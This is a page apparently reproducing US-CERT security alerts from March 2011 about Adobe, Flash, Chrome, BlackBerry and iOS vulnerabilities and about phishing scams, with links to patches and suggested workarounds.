Forbidden Web

Mar 22, 2011 Adobe Releases Security Updates for Reader and Acrobat
Adobe has released updates for Adobe Reader and Acrobat for Windows and Macintosh. These updates address a vulnerability in the authplay.dll component. Exploitation of this vulnerability may allow an attacker to execute arbitrary code.

US-CERT encourages users and administrators to review Adobe security bulletin APSB11-06 and apply any necessary updates to help mitigate the risks.
Mar 21, 2011 Adobe Releases Flash Player Update
Adobe has released an update for Flash Player to address multiple vulnerabilities. These vulnerabilities affect Adobe Flash Player 10.1.102.64 and earlier versions for Windows, Macintosh, Linux, and Solaris, and Adobe Flash Player 10.1.106.16 and earlier versions for Android. Exploitation of these vulnerabilities may allow an attacker to cause a denial-of-service attack or execute arbitrary code.

US-CERT encourages users and administrators to review Adobe Security Advisory APSB11-02 and apply any necessary updates to help mitigate the risks.
Mar 18, 2011 Ongoing Phishing Attack
US-CERT is aware of public reports of an ongoing phishing attack. At this time, this attack appears to be targeting PayPal, Bank of America, Lloyds, and TSB users. The attack arrives via an unsolicited email message containing an HTML attachment.

This attack is unlike common phishing attacks because it locally stores the malicious webpage rather than directing user to a phishing site via a URL. Many browsers utilize anti-phishing filters to help protect users against phishing attacks, this method of attack is able to bypass this security mechanism.

US-CERT encourages users and administrators to take the following measures to protect themselves from these types of phishing attacks:
Mar 17, 2011 Google Releases Chrome 10.0.648.134
Google has released Chrome 10.0.648.134 for Windows, Mac, Linux, and Chrome Frame. This release contains an updated version of the Adobe Flash player that addresses a vulnerability. Exploitation of this vulnerability may allow an attacker to execute arbitrary code.

US-CERT encourages users and administrators to review the Google Chrome Releases blog entry and apply any necessary updates to help mitigate the risks.
Mar 16, 2011 US Tax Season Phishing Scams and Malware Campaigns
In the past, US-CERT has received reports of an increased number of phishing scams and malware campaigns that take advantage of the United States tax season. Due to the upcoming tax deadline, US-CERT reminds users to remain cautious when receiving unsolicited email that could be part of a potential phishing scam or malware campaign.

These phishing scams and malware campaigns may include, but are not limited to, the following:
  • information that refers to a tax refund
  • warnings about unreported or under-reported income
  • offers to assist in filing for a refund
  • details about fake e-file websites
These messages which may appear to be from the IRS, may ask users to submit personal information via email or may instruct the user to follow a link to a website that requests personal information or contains malicious code.

US-CERT encourages users and administrators to take the following measures to protect themselves from these types of phishing scams and malware campaigns:
Mar 16, 2011 BlackBerry WebKit Browser Engine Vulnerability
Research In Motion has released a security notice to alert users of a vulnerability affecting the WebKit browser engine provided in BlackBerry Device Software versions 6.0 and later. By convincing a user to browse to specially crafted website, a remote attacker may be able to execute arbitrary code. Exploitation of this vulnerability may allow an attacker to access user data stored on the media card and the built-in media storage on the affected BlackBerry device.

US-CERT encourages users and administrators to review BlackBerry security notice KB26132 and do the following to help mitigate the risks:
  • Exercise caution when accessing untrusted websites in browsers, email messages, or instant messages.
  • Disable the use of JavaScript in the BlackBerry Browser or Disable the BlackBerry Browser as suggested in BlackBerry security notice KB26132.
Additional information regarding this vulnerability can be found in US Department of Energy Cyber Incident Response Capability (DOE-CIRC) technical bulletin T-579. US-CERT will provide additional information as it becomes available.
Mar 15, 2011 Adobe Releases Security Advisory for Flash Player, Reader, and Acrobat
Adobe has released a security advisory to alert users of a vulnerability affecting the following products:
  • Adobe Flash Player 10.2.152.33 and earlier versions for Windows, Macintosh, Linux, and Solaris
  • Adobe Flash Player 10.2.154.18 and earlier versions for Google Chrome users
  • Adobe Flash Player 10.1.106.16 and earlier versions for Android
  • The Authplay.dll component that ships with Adobe Reader and Acrobat X (10.0.1) and earlier 10.x and 9.x versions for Windows and Macintosh.
Exploitation of this vulnerability may allow an attacker to execute arbitrary code or cause a denial-of-service condition. At this time, the vendor has not released a fix for this vulnerability. The Adobe advisory indicates that this vulnerability is being actively exploited via a Flash (.swf) file embedded in a Microsoft Excel (.xls) file delivered as an email attachment.

Adobe has indicated that it expects to release a fix for this vulnerability during the week of March 21, 2011. In the interim, users and administrators are encouraged to implement the following workarounds to help reduce the risks.
  • Disable Flash in the web browser as described in the Securing Your Web Browser document.
  • Disable Flash and 3D & Multimedia support in Adobe Reader 9 and later.
  • Disable JavaScript in Adobe Reader and Acrobat.
  • Prevent Internet Explorer from automatically opening PDF documents.
  • Disable the displaying of PDF documents in the web browser.
  • Enable DEP in Microsoft Windows.
  • Utilize Microsoft EMET to enable runtime mitgations for Microsoft Internet Explorer and Excel.
Additional information regarding this vulnerability, including detailed workaround instructions, can be found in US-CERT Vulnerability Note VU#192052. US-CERT will provide additional information as it becomes available.
Mar 14, 2011 Google Releases Chrome 10.0.648.133
Google has released Chrome 10.0.648.133 for Windows, Mac, Linux, and Chrome Frame. This update addresses a vulnerability that may allow an attacker to execute arbitrary code.

US-CERT encourages users and administrators to review the Google Chrome Releases blog entry and apply any necessary updates to help mitigate the risks.
Mar 11, 2011 Japan Earthquake and Tsunami Disaster Email Scams, Fake Anitvirus and Phishing Attack Warning
US-CERT would like to warn users of potential email scams, fake antivirus and phishing attacks regarding the Japan earthquake and the tsunami disasters. Email scams may contain links or attachments which may direct users to phishing or malware-laden websites. Fake antivirus attacks may come in the form of pop-ups which flash security warnings and ask the user for credit card information. Phishing emails and websites requesting donations for bogus for charitable organizations commonly appear after these types of natural disasters.

US-CERT encourages users to take the following measures to protect themselves:

Do not follow unsolicited web links or attachments in email messages.
Maintain up-to-date antivirus software.
Review the Recognizing Fake Antivirus document for additional information on recognizing fake antivirus.
Refer to the Avoiding Social Engineering and Phishing Attacks document for additional information on social engineering attacks.
Refer to the Recognizing and Avoiding Email Scams (pdf) document for additional information on avoiding email scams.
Review the Federal Trade Commission's Charity Checklist.
Verify the legitimacy of the email by contacting the organization directly through a trusted contact number. Trusted contact information can be found on the Better Business Bureau National Charity Report Index.

US-CERT will provide additional information as it becomes available.
Mar 10, 2011 Apple Releases iOS 4.3
Apple has released iOS 4.3 for the iPhone 3 GS and later, iPod touch (3rd generation) and later, and iPad to address multiple vulnerabilities. These vulnerabilities affect the CoreGraphics, ImageIO, libxml, Networking, Safari, and WebKit packages. Exploitation of these vulnerabilities may allow an attacker to execute arbitrary code or cause a denial-of-service condition.

US-CERT encourages users and administrators to review Apple article HT4564 and apply any necessary updates to help mitigate the risks.